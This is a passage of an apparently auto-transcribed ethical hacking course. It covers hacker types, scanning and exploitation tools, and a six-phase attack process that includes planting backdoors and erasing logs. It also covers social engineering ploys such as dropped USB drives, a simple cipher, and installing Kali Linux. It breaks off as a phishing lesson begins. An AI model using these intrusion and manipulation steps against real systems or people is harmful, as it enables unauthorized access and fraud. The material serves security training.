misconfiguration or anything that has been left behind by a security administrator that can be misused which means exploited by a hacker to gain unauthorized access so the next term is unauthorized access something that you're not allowed to do and when you say a hacker is a person who tries to hack it's basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place how do they do it they find a vulnerability that is a weakness or a flaw and then they misuse it to gain access to that particular network so here in the diagram you can see that a sender on the left hand side is trying to send some data to the receiver on the right hand side the hacker would try to gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within let's look at a business case scenario into hacking now there is an organization everybody is going around their own business when they realize that their systems may have been compromised now they are trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers however they do realize that some customer data has been lost and even the company reports have been modified as well now this is the scenario where there have been some security controls in place and those controls have been identified they realized that there is an attack that has happened and based on that attack they have realized that the data has now been compromised and the records have been modified by the hacker which means that the data is no longer trustworthy and thus cannot be used by the business for any legal transactions so then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced to be taken back into the original state where it was trusted and thus the organization can utilize it for business transactions the organization has probably no backup so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business does money exchanges and the hacker is able to restore that data and the business continues that as usual however the activity here of a hacker trying to leverage the misconfiguration of the weaknesses in the organization's security thus being able to hack them and make these ransomware demands so the company then wants to figure out even if having a security system in place how was the hacker able to hack their systems thus one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind so that they can plug those flaws and nobody can misuse them thus they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization identify the weaknesses vulnerabilities and flaws and help them remedy those laws so that in future scenarios these scenarios will not happen so before we go into an ethical hacker let's understand what are the types of hackers so what are the types of hackers hacker is a technically skilled person who is very adept with computers they have good programming skills they understand how operating system works they understand how networks work they understand how to identify flaws and vulnerabilities within all of these aspects and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization so there are six type of hackers that have been identified black hat hackers white hat hackers grey hat script kiddies nation's players sponsored hackers and a hacktivist so black hat hackers are basic basically the malicious hackers who have malicious intent and have criminalistic tendencies they want to harm the organization by hacking into their infrastructure by destroying their infrastructure by destroying the data so that they can gain from it from a monetary perspective these guys are also known as crackers the main aspect of these people are that they have malicious intent they try to do unauthorized activities and they try it for personal gain another important aspect to remember is that a black hat hacker will always try to hide their identity they will spoof their online digital identity by masking it by spoofing their ip addresses mac addresses and try to remain anonymous on the network a white hat hacker on the other hand is also an ethical hacker or a security analyst who is an individual who will do exactly the same thing that a black hat hacker would do minus the malicious intent plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities so they are authorized to act on the company's behalf they are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws improving on their security portion so these uh these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks grey hat hackers is a blend of both white hat and black hat hackers so here they can work defensively and offensively both they can accept contracts from organizations to increase their security posture at the same time they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity script kitties are people uh who are technically not much aware about what hacking is they rely on existing tools that have been created by other hackers they have no technical knowledge of what they're doing it's just a hit or miss for them so they just get their hands on a tool they try to execute those tools uh if the hack works it works otherwise it doesn't so these people are basically who are noobs or newbies who are trying to learn hacking or uh just uh people who with malice's intent who just want to have some fun or trying to impress people around then we have the nation or the state-sponsored hackers as the name suggests these hackers are sponsored by their government now this may not be a legitimate job but most of the governments do have hackers enrolled in their pay on on their organizations to spy on their enemies to spy on various countries and try to figure out uh the aspirations of those countries so this is basically a spying activity where you are technically trying to get access to other countries resources and then try to spy on them to figure out what their activities have been or what their future plans have been and then we have the hacktivist who is an individual who has a political agenda to promote and they promoted by doing hacking so these guys what is the difference between a black hat hacker and a hacktivist the black hat hacker may try to hide their identity a hacktivist will claim responsibility of what they have done so for them it's a political agenda political cause and they will try to hack various organizations to promote their cause they would probably do this by defacing the website and posting the messages that they want to promote on these websites so what exactly is ethical hacking then we have discussed the types of hackers we have identified a malicious hacker as a black hat hacker with the intent of doing harm to an organization's network for personal gain we have discussed what the ethical hacker is so an ethical hacker would be doing the same activity but in an authorized manner so they would have legal contracts that they would be signing with the organization it would give them a definite scope of what they are allowed to do and what they are not allowed to do and the ethical hackers would function within those scopes would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities and then they would be submitting a report to the management of what they have found they would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on they might use the same techniques and the same tools that black hat hackers do however the main difference here is that these guys are authorized to do that particular activity they're doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains so who's an ethical hacker again an ethical hacker is a highly intelligent highly educated person who knows how computers function how programming languages work how operating systems work they can troubleshoot they're technically very adept at computing they understand the architecture they understand how various components in a computer work they can troubleshoot those components and they can basically be very good with programming as well now when i say programming we don't want the ethical hacker to be a good developer of applications we want them to understand programming in such a way that they can create scripts they can write their own short programs like viruses worms trojans or exploits which should help them achieve the objective that they have set out for so uh here you can see the ethical hacker there are individuals who perform a security assessment of the companies with the permission of concerned authorities so what is the security assessment a security assessment is finding out the exact security posture of the organization by identifying what security controls are in place how they have been configured and if there are any gaps in the configurations themselves so an organization will hire a heckler hacker they they would give the ethical hacker the information about what information is or what security controls what firewalls now what idss ipss introgen detection or intuition prevention systems antiviruses are already in place and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization what is the need of an ethical hacker the need of an ethical hacker is proactive security the ethical hacker would identify all the existing flaws in an organization and try to resolve those laws to help secure the organization from black hat hackers so ethical hackers would prevent hackers from cracking into an organization's network by securing the organization by improving on their security on a periodic basis and they would also try to identify system vulnerabilities network vulnerabilities or application level vulnerabilities that would have been missed or have already been missed and then tried to figure out a way of plugging them or resolving them so that they cannot be misused by other hackers they would also analyze and enhance an organization security policies now what are policies policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained for example a password policy a password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity for example a password when a user is creating them should adhere to standards where they are using random words they are they contain the alphabet a through z uppercase and lowercase 0 through 9 as numerics and special characters and they're randomized so that the password becomes much more stronger to prevent from brute force attacks so what would an ethical hacker do at this point in time they would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible and if any of these passwords can be cracked they will ensure that all the employees are following the policies and all the passwords are as secured as the policies want them to be if there are any gaps in the policies or the implementation of the policy it is the ethical hacker's responsibility to identify those gaps and warn the organization about it similarly they would also try to protect any personal information any data that is owned by the organization that is critical for the functioning of the organization and they will try to protect it by from falling into the hacker's hands now what are the skills that are required of an ethical hacker these are the following skills so first and foremost they should have good knowledge with operating systems such as windows linux unix and mac now when we say knowledge about operating systems it's not only about how to use those operating systems but how to troubleshoot those operating systems how these operating systems work how these operating systems need to be configured how can they be secured for example securing an operating system is not only installing a firewall and an anti-virus but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do for example limiting the installation of applications how are we going to do that we need to go into the system center the security center of windows and we need to configure security parameters over there of what are acceptable softwares and what are not same with linux and mac software's operating systems so we need to know how we can secure these operating systems similarly all of these would have desktop versions and server versions of operating systems as a ethical hacker we need to know the desktop and server versions both how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees at the same time they should also be knowledgeable of programming languages or scripting languages such as php python ruby html for programming if you will because web servers come into the picture so again they should not be great developers where they can create huge applications but they should be able to develop scripts understand those scripts analyze those scripts and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for an ethical hacker should have a very good understanding about networking no matter whether you're in application security you're in network security or you're in host-based security since a computer will always be connected to a network either a local area network like a lan or the internet we should know how networking works we should know the seven layers of the osi model we should know which protocols work on those seven layers we should identify the tcp model and how osi model can be mapped to the tcp model we should understand how tcp and udp work how how each and every protocol is crafted how they are supposed to behave for us to analyze and understand any network based attacks we should be very good in security measures so we should know where those vulnerabilities would lie what are the latest exploits available in the market and we should be able to identify them we should be able to know the techniques and the tools of how to deal with security how to analyze security and then how to implement security to enhance it as well along with that it is important that a security analyst or ethical hacker is aware of the local security laws and standards why is that because an organization cannot do any illegal activity whatever responses that they have whatever security mechanisms whatever security controls they will implement they need to be adhering to the local law of the land they should be legal in nature and should not cause undue harm to any of the employees or any of the third party clients that they are dealing with so the ethical hackers should be aware of what security laws are before they implement security controls or even before they start testing for security controls and all of these should be backed up by having a global certification or a globally valid certification related to networking related to security ethical hacking the law of the land anything and everything maybe even programming uh it's good to have a certification in php perl python ruby and so on so forth why because most of the organizations when they hire ethical hackers look out for these certifications especially globally valid certifications so that they can be sure or they can be assured that the person that they are hiring has the required skill set so let's talk about a few of the tools that an ethical hacker would utilize in the testing scenarios to be honest there are hundreds of tools out there what you see on the screen has just a few examples of them uh nessus is a vulnerability scanner what is a vulnerability scanner it is an automated tool that is designed to identify vulnerabilities within hosts within operating systems within networks so they come with their ready-made databases of all the vulnerabilities that have already been identified and the scan the network against that database to find out any possible flaws or any possible vulnerabilities that currently exist on the host or the operating system or on the network similarly there would be application scanners like acunetix or arachne that would help you scan applications and identify flaws within those applications as well now all of these are automated tools the essence of ethical hacker is when these tools churn out the reports the ethical hacker can understand these reports analyze them identify the flaws and then craft their own exploits or use existing exploits in a particular manner so that they can get access or they can bypass the access or security controls mechanisms that are already in place how can they do that with the tool called metasploit you see that big m there on the right hand side that m logo is for a tool called metasploit which is a penetration testing tool what is a penetration testing tool it is that tool that will allow a ethical hacker to craft their exploits or choose their exploits for the vulnerabilities that have been identified by nessus since we are interacting with computers we will always be interacting using tools right so the first tool nessus identifies the flaws and the possible list of vulnerabilities we do a penetration test using metasploit to validate those flaws and to verify that those flaws actually exist and try to figure out the complexity of those flaws and that's where metasploit helps us do that wireshark would be used in the background while we are doing both the activities using nessus or metasploit to keep a track of what packets are being sent and by received on the network which will help us analyze those packets so whenever i run an ss scanner i would run a wireshark in the background it will capture the data packets and i can go through those data packets and analyze that data package to identify what nessus is actually trying to do similarly when i try to attack a machine using exploit on metasploit i will keep on wireshark running in the background to capture the data package that have been sent and the responses that i have received from the victim so that i can also go through those packets and analyze the responses and analyze the attack whether it was successful to what extent was it successful and basically will also give me a validation of proof of the activity that has happened nmap is another automated tool that allows me to scan for open ports and protocols so why would i use nmap because pro ports and protocols become an entry point for a hacker to gain access to devices for example when we connect to a web server we connect through a web browser but we automatically connect to port 80 using http and port 443 is using https so if i'm connecting to a web server using https it is safe to assume that port 443 on the web server is open to accept those connections similarly there would be other services that may be left open on the web server because nobody thought about configuring it or they misconfigured the web server and they left unwanted services running so nmap will allow me to scan those ports and services and allow me to understand what services are being offered on that server so then i can start analyzing that server identify those flaws within those services and then try to attack them if the application that i'm analyzing is connected to a database and i want to do a sequel injection attack or if i if nessus tells me that there is a sequel injection attack that may be possible on that particular application i can use an automated tool called sql map or sql map that would allow me to automatically craft all the queries that are required for a sql injection attack and help me do that attack at the same time so here i do not have to manually create my own queries uh the sql map tool would automatically create them for me what i would do is i would use nessus to identify that particular flaw if necessary post that flaw i would then go use the tool sql map configure it to attack that particular web server and when i fire off the tool it will then automatically start directing queries sql injection queries to the database to see if those databases are vulnerable and if yes what data can be retrieved from those databases so all of these tools in a nutshell would help me hack networks applications operating systems and host devices and this is what the ethical hacker does they use these kind of tool sets they identify what attacks they need to do they identify the right tool for that particular attack and they write their exploits they create those attacks and then they start attacking analyze the response and then give a report to the management providing them feedback about how the attack was created or crafted what was the response to that attack and whether the attack was successful or not if successful they would also give recommendations of what to do to prevent these attacks from happening in the future so when we are doing these attacks or when we want to launch these attacks what is the process that we would follow so there are six steps that we would do as an ethical hacker if you are just a hacker you probably wouldn't do the sixth step which is a reporting step so the first step that would be done is the reconnaissance phase which is the information gathering phase which is very important from ethical hackers perspective or a hacker's perspective because if i want to attack someone or something as a digital device i need to know what i'm attacking i need to know the ip address of the device the mac address of those devices i need to know the operating system the build or the version of that operating systems applications on top the versions of those applications so i know what i'm attacking for example if i if i want to attack a server i assume it's a windows based server and i use a particular tool to attack it but it actually turns out to be a linux way server my attacks are going to be unsuccessful so i need to focus my attack based on what is there at the other end so in my information gathering phase i want to identify all of that information once i have that information done i'm going to scan those servers using tools like nmap that we just talked about and we're going to try to see the open ports open services and protocols that are running on that server that can give me possible entry points within the network or within the device or within the operating system at the same time along with the scanning with nmap i would run a vulnerability scanner the nessus vulnerability scanner we talked about or acunetix for applications and then i would try to identify vulnerabilities in those applications operating systems or networks once i have identified those vulnerabilities in the scanning phase i would then move on to the gaining phase where i would then craft my exploits or choose existing exploits and start attacking the attacking the victim at this point in time if my attack is successful i will probably have gained access by either tracking passwords or escalating privileges or exploiting a vulnerability that i may have found during the scanning phase once i have gained my access i want to maintain my access why because the vulnerability may not be there for long maybe somebody updated the operating system and hence the flaw was no longer exist or existing or somebody changed the password that me i may have cracked does i no longer have access so what do i do to maintain my access i install trojans or backdoor entries to those systems using which i can secretly in a covert manner get access to those devices at my own will at my own time as long as those devices are available over the network so that's where i maintain my access i have hacked them now i want to maintain my access so i install a software which would give me a backdoor entry to that device no matter what once i have done this i want to clear my track so whatever activity that i've been doing for example installing a trojan a trojan is also a software that would create directory directories and files once installed on the victims machine so i want to hide that if i have access data stores if i have modified data i want to hide that activity because if the victim comes to know that something has happened they would start they would start increasing their security parameters they might start scanning their devices they may take them offline thus my hack would no longer be efficient the reason i'm clearing my tracks is that the victim doesn't find out that they have been hacked or they have been compromised or even if they do find out that they've been compromised they cannot trace the compromise back to me so i would be deleting references of any of the ip addresses or mac addresses that i may have used to attack that particular device and this is where i will be able to identify where those logs were created where those traces are once i take off those traces the victim would not be any wiser of whether they have been compromised or who compromise their system and if i am successful at all of these stages or what to whatever extent the success that i've achieved in any of these stages i would then create a report based on that and i would report to the management about the activities that we have been able to do and whatever we have been able to achieve out of those activities for example we identified 10 different flaws there were 20 different attacks that we wanted to do what attack did we do what was the outcome of that attack what was the intended or the expected output of that attack i'll create a report which would give a detailed analysis of all the steps that were taken along with screenshots and evidences of what activity was conducted what was the output what was the expected output and i would submit that report to the management giving them an idea of what vulnerabilities and flaws exist in their environment or their devices that need to be mitigated so that the security can be enhanced so these are the six steps that the ethical hacking process would take uh just going through this the uh recognizance is where you're going to use hacking tools like nmap hp to obtain information about targets there are hundreds of tools out there depending on what information you want then in scanning again nmap nexpose these kind of tools to be utilized to identify open ports protocols and services in gaining access you're going to exploit the vulnerability by using the metasploit tool that we talked about in the previous slides in the maintaining access you're going to install back doors you can use metasploit at the same time you can craft your own scripts to create a trojan and install it on the victims machine once you have achieved that clearing tracks is where you're going to clear all evidences of your activity so that you do not get caught or the victim doesn't even realize that they have been hacked and once you have done all of this we are going to create reports that are going to be submitted to the management to help them understand the current security evaluation of their organization so now let's see how we can hack using social engineering now what is social engineering social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed so this is where your social skill and your people skills come into the picture if you are able to communicate effectively to another person they would probably give up more information that they intended to give out let's take a look at examples right if you see on the screen fishing activity what is fishing we receive a lot of freak meals on a regular basis we have always received those emails where we have won a lottery of a few million dollars but we have never realized that we didn't purchase a lottery to win a lottery in the first place we have always had those nigerian frauds where a prince died in some south african country and you out of seven billion people on the planet have been identified where they want to transfer a few hundred million dollars through your account and they want to give you 50 percent of that money in return as thank you so some very basic attacks where you go onto websites and there's a banner flashing at you saying congratulations you're the one millionth visitor to this website click here to claim your price all of these are social engineering attacks phishing attacks fake websites fake communications being sent out to users to prey on their gullibility most of humans always have that dream of striking it rich winning a huge lottery once and for all and living their life lavishly ever after but sadly in the real world that's not that doesn't happen that often and if you're receiving those mails it is very important that you first research the validity of those those communications before you even want to act upon them so why are humans susceptible to social engineering because humans have emotions machines do not try pleading with the machine to give you access to a account that you have forgotten a password to the machine wouldn't even know what you're doing try pleading with a human sympathy or empathy where you could try to create a social engineering attack where you can plead with them saying if i do not get access to this account immediately i might lose my job and then that would put my family into problems somebody would feel empathy or sympathy towards you and help you reset that password and give you access to that account it's how good the attack is and how convincing you are for the success of this attack to happen so what is a familiarity exploit attackers interact with victims to gain information which will benefit the attackers to crack credentials as passwords if we want to reset our passwords what do we have as a mechanism to resetting passwords we have some security questions that we set up those questions are nothing but personal information that we would know but through a social engineering attack it would be easily be able to gather the information that you have set for your security questions the security questions can be as simple as the first school that you attended you probably have that listed on your linkedin profile where a person can just go in there and see your academic qualifications and identify the school that you're in right similarly it might also be a question what was your mother's maiden name that's a very good attack and that's uh i mean if a person can interact with you let's say they are trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn't think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it's upon us to verify the authenticity of the request coming in before we answer it phishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind uh fake websites and so on so forth exploiting human curiosity curiosity killed the cat right so there was there's so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is an open a generic attack whoever falls victim will fall victim so if i just throw around a few usbs in the parking lot obviously with trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on their pen drives at the same time once they plug in those pen drives on their computers the virus or the trojan would get infected and cause harm to their machine then exploiting human greed we just talked about the nigerian frauds and the lotteries those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person's greed kicking in and they are clicking on those links in order to get that money that has been promised to them in that email so one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we're just making it unreadable or non-readable by using a particular key or a particular algorithm and then we're going to send the key to the end user the you end user using the same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it so the encryption algorithm would be something like this now if you see uh the computer word once made into unreadable format would look like eq or xvgt for an end user it wouldn't make any sense but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word so this is just a substitution cipher that is being shown on the screen so what is the alphabet the key is alphabet plus three so c plus three alphabets that becomes e o becomes q m becomes o so the key that is utilized to scramble the data is the character that you are at the third character from there would be the corresponding key so the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e corresponding to by going back three characters in the alphabet most of the times a certified ethical hacker must decrypt a message without knowing the secret key so let's say a ransomware has affected your organization or has affected a device and you want to figure out or you want to decrypt that data now as ethical hacker you wouldn't be for paying a ransom to the hacker would you so it is now your prerogative of how you're going to work around and how you're going to try to crack the encryption mechanism how to crack the cipher to decrypt that message and see what's within it right decryption without the use of a secret key that is known as a cryptanalysis cryptanalysis is the reversing of an algorithm to figure out what the decryption was uh without using a key so cryptanalysis can be done using various formats the first one is a brute force attack second is a dictionary attack a third one is a rainbow table attack a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100 successful but may take a lot of time a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not rainbow tables are where you have an encrypted text in hand and you're trying to figure out uh the similarities between between the text that you have and the encrypted data that you wanted to decrypt in the first place so in the brute force attack you're trying every possible combination permutation of what the key would be in dictionary attack you have a word list that would tantamount to the key and if you're trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data here in the rainbow table the cipher text is compared with another cipher text you find out similarities and then you try to work or reverse engineer your way accordingly so let's have a quick demo on cryptography before we end this session so to begin with the demo of cryptography we are on our website called spammic.com which will help us scramble the message that we created into a completely uh format which would be unrelated to the topic at hand so if i say i want to encode a message i turn a short message into spam so what this does is you want to send across a secret message you type in the secret message a short one it will convert that into a spam mail you send it across so whoever's reading that spam mail would never get an idea of the embedded message within it so if i want to type in a message here hi this is a secret message the password is asd at the rate one two three four and i want to send this out to people or to one of my colleagues but i want to send it out in a secret manner so that others are not aware of this so when i press on encode what the algorithm will do is it will convert this message into a spam mail so my message hi this is a secret message the password is at the rate one two three four or asd at the rate one two three four gets converted into this now if you read it dear e-commerce professional this letter was specially selected to be sent to you this doesn't make sense there is nowhere or no reference to the actual message that i've already said so if i copy this entire message and i send it let's say via email to the recipient now the thing is that the recipient needs to know that i've encoded it using spam mimic the algorithm remain needs to remain the same so once they know that it is spam mimic what they can do is now in this instance what i'm going to do is i'm going to open up a new browser and i'm going to go to the same website and at this point in time i'm going to click on decode when i click on decode i'm going to paste the message that i have just copied there we are and this message is now being copied into a different browser and if i decode this you will see that it will convert it back to the original message that there was so the key is there at spam mimic and it is embedded within the message so whenever we paste the message in the decode factor it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it there we are the entire message this is what we created in the google chrome browser and in the firefox browser we decoded similarly if i want to protect these kind of messages there is an aspen encrypt.com website where let's say we use text encryption and i want to encrypt the same message this is a secret message the password is asd at the rate one two three four and then i give it a password to protect this message let's say the word password and i use the cipher to scramble this by using let's say aes which is the strongest cipher right now and i say encrypt so this is what the encryption would look like and basically if i don't have the password over here if i decrypt it you would see that the error has occurred now if i type in the password over here and then decrypt it it will be able to convert that back into the unscrambled text and it will give me what the original message was this is a secret message the password is asd one two three so if i want to keep my data secure from hackers i want to scramble it in such a way that they would not be able to crack it or it would be very difficult for them to crack it and this is one of the first mechanisms that would be recommended by any ethical hacker to keep the data secure now let's talk about downloading and installing kali linux along with that we'll also be looking at the basic commands that are required for kali linux alright so i've opened my browser and we want to go to the kali website so we want to go to kali.org you can directly type in kali.org and go to the website i can just do a google search and say kali download and it will give you the same website but it will directly take you to the downloads pages so either here and or you can go to the home page uh cookies are being installed on your machine so see which cookies you want to allow i'm only going to use the necessary cookies to support the site and you can see that this gives you the latest kali linux news and tutorials gives you the latest release what is in that release and gives you a lot of documentation which will help you understand what tools have been developed and what functionality has been given in the latest version if you want to download you can directly go here and you can download kali linux now kali linux is a 2.6 gigabyte download so it's going to take time the latest version being 2019.4 and we click over here i'm using a download manager to manage all these huge downloads and you can see it's pointed to the operating systems folder and it is going to be a 2.57 gb download so you click on download and in the background you can see this is going to be downloaded and you're going to minimize this and it will take a few minutes for that to download but this is an iso image so we need to install it on a virtual machine so what we need is we need to use a hypervisor which will allow us to create virtual machines so we can either use vmware workstation which you can download from here however uh this is paid version so you can see it is around 250 or something for uh this software but it is a very good software to have so if you click on download now it is going to start the download it's a 30-day trial period if you want to use it after 30 days you'll need to enter the key which you'll get after purchasing the software if you do not want to utilize this the free version that you have you can either download vmware player but there are some limitations for vmware player that you might want to look at does you want to compare these products before you want to purchase them right otherwise you can download oracle virtualbox which is a free hypervisor it's not as robust as vmware workstation but it does the trick right so the the free version 6.1 is free and you can then create your own virtual machines over there and install operating systems on them what i do have i already have a vmware workstation installed so i'm just going to open that up and that's my vmware workstation as you can see i already have a lot of virtual machines created over here what we are going to do is we are going to configure a virtual machine for the kali linux operating system that we are downloading which should be somewhere here let's see it's at 43 percent so halfway there till then let's create the virtual machine so i click click on file create a new virtual machine i'm going to customize the machine so click on next this little default we don't want to change that and then we want to install the operating system later we don't want to point it out right now so i'll just click on i will install the operating system later click on next we want to install linux now in the drop down you would not see kali linux over here however you can choose ubuntu 64-bit that's what i'm going to choose there it is next what is the name that we want i want to give it kali linux without the typo and i want to store it in one of the folders that i've created by default it stores on the c drive which is not a good place to store uh you don't want to run out of space on your c drive so i'm going to click on this pc and this is my data and in here i'll have a folder called virtualbox or virtual machines there it is within which you can see the other softwares that i already created i'm going to create a new folder and call it kali 2019 l l for is latest for me because you can see already have a kali linux so i'm just going to identify this folder with the l at the end going to select it and click on ok you can see the path being changed over here click on next it's going to ask you how many processors now depending on the processor that you have you can see i've got a 8 core i7 so if i give it 16 cores or 16 processors that's not going to work i cannot go beyond what the physicality already is so for this machine one processor with one core is more than enough if you're going to load use a lot of tools at the same time you might just want to give it two cores so given it two cores it will ask us for ram to be provided for this virtual machine by default 2048 megabytes that's 2gb of ram is more than enough if you require more we can change this later on so click on next we want to use nat for now leave this default next whatever is recommended keep it the way it is we do not want to change it next create a new virtual hard disk for this machine and it is going to ask us the size 20 gb is more than fine store it as a single file you don't want to use multiple file options click on next and then click on browse wherever you want to store the vmdk file or the virtual hard disk file and we go back again to the same folder that we had created virtual machines and we look at the kali linux kali 2019 l and we want to store the vmdk file over there once we save it we want to click on next and then we want to click on finish so this is the virtual machine that has been created right here right now this is the basic configuration now where are we at with the operating system and you can see the operating system has been downloaded and it is stored in this particular folder so we go to e drive so we are looking for the sub the operating system that we have downloaded we downloaded in the operating systems folder and if we go in here you can see the current one the kali linux 2019.4 iso right here so what we do we go back to the kali linux machine that we have created edit virtual machine settings and we point this virtual machine using the cd dvd and then we point the iso the one that we downloaded over here so we go back to e drive we go back to os and we click on kali linux 2019 click on open so now when this boots up it will boot up with this iso and then it will allow us to install the operating system so click on ok then we click on power on this virtual machine it will start powering on it will boot to the iso and it will start giving us the booting options so i'm just going to enter the full screen mode over here for this to be better visible and we don't want the live mode what we want is we want to use the graphical install and then we highlight that we press enter and you can see the setup starting up we'll wait for the gui to pop up there it is which language do we want for now we want english click on continue where are we located click on continue and the configure your keyboard we want the us keyboard american english continue it is going to detect the hardware so as you can see on the screen it's attempting a auto configuration for most of these uh settings the network with dhcp it has identified the network cards uh hardware like uh the processor that has been provided or is asking for a host name we're going to leave it at default we're going to click on continue domain name i'm not joining this into a domain as yet there's going to be a standalone machine so i can leave this blank click on continue now it is going to configure the network it is asking for a password at this point in time the root password type in any password that you want ensure that you remember the password now by default the username for the account is the name is the word root we are just creating the password for the root account and then we want to click on continue setting up the clock looking at the hard disks now here it asks us do we want to use the entire disk the 20 gb virtual hard disk that we had provided or do we want to give it a manual configuration or a guided one where we want encryption and a logical volume management coming into the picture we're just going to use the first option guided you use entire disk don't worry it's only going to use the virtual disk that we had created click on continue it will give us that it's a 21.5 gb vmware virtual disk that we had and click on continue all files in one partition that's what we want recommended for new users whatever it is we don't want to change these folders continue and this is what we have configured once we click on continue it is going to say you are you sure you want to make these changes click on yes click on continue and it will start installing kali linux on your device now this is going to take a few minutes for the installation to work all right so that's the installation that's completed now it's asking us to configure a package manager a network mirror can be used to supplement the software that is included on the installation media this may also make new versions of software available you want to use a network mirror we can click no for now and then click on continue now this is going to install the grub boot loader this might take a few minutes as well install the group grub loader to the master boot record yes click on continue click the hard disk that you have just utilized this is the one click on continue it will install the grub boot loader running through the last phases of the installation and now it says the installation is complete we want to click click on continue finishing the installation and then it will do a reboot all right and okay you can see this is starting up so we are going to use you just wait out the boot and now it started the booting sequence just going to maximize the screen and you can see it's asking me for the password this is the one that we created now that's the that's not the password that's the username that's the root and the password that we had created at that point in time and then click on login and this is your screen now what we need to do here is we need to install vmware tools which will help us manage the screen and help the virtual machine to be a little bit better integrated on the system so that's not mounted yet so we're just waiting for it to mount there it is and what we want to do here is open vmware tools upgrader all right so what we want is we want to extract or we want to use this open x archiver and once we do that we'll see the vmware install dot pl double click on that all right we've got the vmware tools here what i've done is we have extract to and have extracted that on the desktop right so what we just did was click on the desktop over here open and this is what it will do and click on extract now there is happening because i've already extracted this open this up we want to run this vmware install dot pl so what do we do we open up the terminal window which is the command line interface over here and now this is where some of the commands come into the picture so for example pwd will show us the present working directory ls will show us the list of the folders that are there so the folder that we have is on our desktop so we'll just change directory to desktop press enter do an ls that will show us the list and you can see vmware tools distribute that's the folder that we have right here right so we want to go into that folder see the vmware at this point you can just click on tab and it will populate everything over there press enter do an ls and we want the vmware hyphen install dot pl to be executed all right so we tried executing that command we had an error over there so what we need to do is we need to execute this command so dot slash vmware in hyphen install.pl and we'll start creating now uh it will ask you for your input installing vmware tools in which directory do you want to install the binary files uh by default it is going to use slash usr slash bin if i just press enter it is going to use the default as you can see the input over here what directory do you want the init directories i'm just going to press keep on pressing enter for the defaults to come in this part does not exist it is going to create it default yes defaults everywhere and then it's twice to start initializing it to maximize the screen and this is where it is installing and you can see by just installing that it automatically adjusted the screen and now we got a full screen of kali linux right here right and that is what vmware tools does for us once we have installed the operating system and now you can see the entire screen on here you will see the tool sets that are given here now why are we using kali linux in the first place because this comes in uh with a bundle of thousands of softwares that are ready to be utilized for ethical hacking right and they have been categorized over here for information gathering vulnerability analysis web application analysis and so on so forth so you can see from forensics onwards reporting tools and as you scroll down you can see your development tools graphics coming in internet and the system configuration coming into the picture these are your settings for your operating system so these are basically your tools we are writing on the favorites if i click on information gathering you will see that other tools for information gathering start appearing over here for vulnerability analysis we have got sparta and map fuzzing tools web application analysis we've got comics skip fish sql map database assessments password attacks and so on so forth so if we just go in the favorites this was the terminal emulator that we utilized is the command line that we saw we use the cd command we use the pwd command we did the ls command as well to give us the list of the directory that we are in similarly there would be commands like cat so let's go to cd downloads let's see what the uh what's there you can see this case sensitive so if i type in a capital d and then do a tab ls there's nothing over here on download so cd dot dot will take us back one directory i can see we are back from downloads to root if i want to go to desktop this is how i go to desktop do a ls you can see the vmware tools uh folder over there cd vmware tools and we go into that folder ls so it'll give us the list of all those files now you can see install is a file that we had edited back then so if i do a cat install you will see the cat basically is the command that will help us look at the contents of the file all right without opening up the file without editing the file so you can see just uh if i scroll up this is where we give the cat command it then printed the contents of the file over here and then it exited and gave me back to command line right here right now if i want to copy this cp root desktop vmware install and if you want to copy it to root downloads and press enter now what we are going to do is we are going to see if this file the install file that we just edited over here has been copied to the downloads folder so we do us we are currently in the vmware on the desktop vmware tools district folder video cd dot dot that takes us down one directory so we are still in the desktop do a cd dot dot now you can see we are back in the root and now we are going to do a cd downloads run ls and you can see the copied file right here so if i do a cat install you can see the same content of that file coming in so these are some of the commands that we would need to learn as we go ahead the remove command is let's say we've got install we do a man rm man is the manual page command that gives us the pages with the description of how that particular command is to be utilized so rm is remove files or directories synopsis is the description the options hyphen f4 hyphen i for prompt hyphen capital i prompt once before removing more than three files and so on so forth if you want to exit this you can press q to exit and you come back to this page so if i say rm install ls you will see that the install file has now been deleted so in windows we use the del del command in linux it is the rm command all right let's begin with the fishing tutorial we have the kali linux operating system booted up over here uh what we are going to do is we are going to open up a tool called set social 